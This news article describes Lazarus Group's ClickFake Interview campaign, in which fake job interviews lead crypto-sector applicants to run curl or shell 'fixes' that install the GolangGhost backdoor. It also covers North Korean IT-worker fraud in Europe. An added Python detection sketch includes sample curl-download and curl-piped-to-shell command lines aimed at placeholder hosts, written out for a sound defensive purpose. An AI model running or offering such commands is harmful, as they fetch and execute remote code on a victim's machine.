North Korea’s Lazarus Group is once again making headlines, this time using a deceptive social engineering tactic called ClickFix to infect job seekers—particularly in the cryptocurrency and centralized finance sectors—with a stealthy cross-platform backdoor named GolangGhost.
🎯 A Sophisticated Social Engineering Attack: "ClickFake Interview"
Cybersecurity researchers at French firm Sekoia have named this new wave of attacks ClickFake Interview, an apparent continuation of the earlier campaign dubbed Contagious Interview (also known as DeceptiveDevelopment, DEV#POPPER, or Famous Chollima), first observed in December 2022.
The Lazarus Group, backed by the Reconnaissance General Bureau (RGB) of North Korea, is leveraging fake job listings on legitimate platforms like LinkedIn and X (formerly Twitter) to lure victims into downloading malware-disguised video interview tools. These tools infect Windows and macOS machines with GolangGhost.
💡 What is the ClickFix Technique?
ClickFix, a rising social engineering method first spotlighted in late 2024, tricks users into performing tech "fixes" during a fake job interview process. Victims are directed to Willo, a fake video assessment platform, and are asked to enable their camera. Once an error prompt appears, they’re instructed to download a "driver" to fix the issue—this is the trap.
Windows Users:
- Told to open Command Prompt and run a curl command.
- The command downloads and executes a VBS script, launching GolangGhost via batch execution.
macOS Users:
- Asked to run a shell script in Terminal, leading to a stealer module called FROSTYFERRET (aka ChromeUpdateAlert) and the backdoor.
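As an added illustration (not code from the article or from Sekoia), the following Python sketch shows one way a defender could hunt for the chain described above in process-creation telemetry: a download launched from an interactive console followed by a script host running the fetched .vbs/.bat/.sh file, or curl piped straight into a shell. The event field names and the sample events are constructed assumptions, not real telemetry.

```python
"""Heuristic detection of a ClickFix-style "paste this fix" chain in process logs."""
import re

# Constructed sample events approximating the chain the article describes.
# Windows: cmd.exe -> curl.exe download -> wscript.exe runs a .vbs -> cmd.exe /c batch.
# macOS:   Terminal -> bash runs a downloaded shell script.
# Field names (host, parent_image, image, cmdline) are assumed, as in a generic EDR feed.
SAMPLE_EVENTS = [
    {"host": "win-01", "parent_image": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"host": "win-01", "parent_image": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl -o %TEMP%\\camfix.vbs http://example.invalid/camfix.vbs"},
    {"host": "win-01", "parent_image": "cmd.exe", "image": "wscript.exe",
     "cmdline": "wscript %TEMP%\\camfix.vbs"},
    {"host": "win-01", "parent_image": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c %TEMP%\\run.bat"},
    {"host": "mac-07", "parent_image": "Terminal", "image": "bash",
     "cmdline": "bash -c \"curl -fsSL http://example.invalid/driver.sh | sh\""},
    # A lone download from a console is normal developer activity and must not alert.
    {"host": "dev-02", "parent_image": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl -O https://example.invalid/sdk.zip"},
]

CONSOLE_PARENTS = {"cmd.exe", "powershell.exe", "terminal", "iterm2"}
DOWNLOADERS = {"curl.exe", "curl", "wget"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "sh", "bash", "zsh"}
SCRIPT_EXT = re.compile(r"\.(vbs|bat|cmd|sh)\b", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"curl\b.*\|\s*(sh|bash|zsh)\b", re.IGNORECASE)


def detect_clickfix(events):
    """Return (host, reason) pairs where a console-typed download is followed by script execution."""
    hits = []
    downloaded = set()  # hosts on which an interactive console spawned a downloader
    for e in events:
        parent, image, cmd = e["parent_image"].lower(), e["image"].lower(), e["cmdline"]
        # Piping curl output straight into a shell is suspicious on its own.
        if parent in CONSOLE_PARENTS and PIPE_TO_SHELL.search(cmd):
            hits.append((e["host"], "curl piped to shell from console"))
            continue
        if parent in CONSOLE_PARENTS and image in DOWNLOADERS:
            downloaded.add(e["host"])
        elif e["host"] in downloaded and image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
            ext = SCRIPT_EXT.search(cmd).group(0)
            hits.append((e["host"], f"{image} ran {ext} after console download"))
    return hits
```

In production the correlation would be keyed on session and time window rather than host alone, but the two signals (console-spawned download, then script host on the fetched file) are the ones this lure produces.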
🛑 What GolangGhost and FROSTYFERRET Do
- FROSTYFERRET displays a fake Chrome window, requesting camera/microphone access and prompting for the system password. Regardless of the password’s validity, it is exfiltrated to a Dropbox location—possibly to unlock iCloud Keychain secrets.
- GolangGhost offers attackers remote control capabilities, including:
  - File upload/download
  - System reconnaissance
  - Web browser data theft
🕵️♂️ Who Are the Targets?
Sekoia observed that unlike prior DPRK job scam campaigns (which targeted software developers), this one focuses on non-technical roles, including:
- Business Development Managers
- Product Developers
- Asset Management Roles
- DeFi Specialists
This marks a strategic shift, highlighting Lazarus’ evolving tactics.
🌍 North Korean IT Worker Fraud Expands Across Europe
In parallel, Google’s Threat Intelligence Group (GTIG) has revealed a sharp uptick in North Korean IT worker operations across Germany, Portugal, and the UK.
North Korean nationals are:
- Faking identities (posing as Italians, Japanese, Vietnamese, etc.)
- Using GitHub, Upwork, Freelancer, and Telegram to land gigs
- Involved in CMS, bot development, blockchain, and web development
- Getting paid through crypto, Payoneer, and TransferWise
What’s worse? They’re now infiltrating companies with BYOD (Bring Your Own Device) policies, which typically lack enterprise-grade security protections.
💣 The Insider Threat Evolves: Extortion on the Rise
Since October 2024, cases have surfaced of North Korean IT workers demanding ransom from their employers, threatening to leak sensitive data or sell it to competitors.
“Europe needs to wake up fast,” warns GTIG’s Jamie Collier. “North Korea’s pivot to Europe is a tactical response to U.S. crackdown, and they're adapting with alarming speed.”
🔐 Final Thoughts: Lazarus Isn’t Slowing Down
From SWIFT banking hacks and ransomware to crypto theft and now sophisticated social engineering, Lazarus continues to innovate its cybercrime playbook—all in an effort to fund the regime under international sanctions.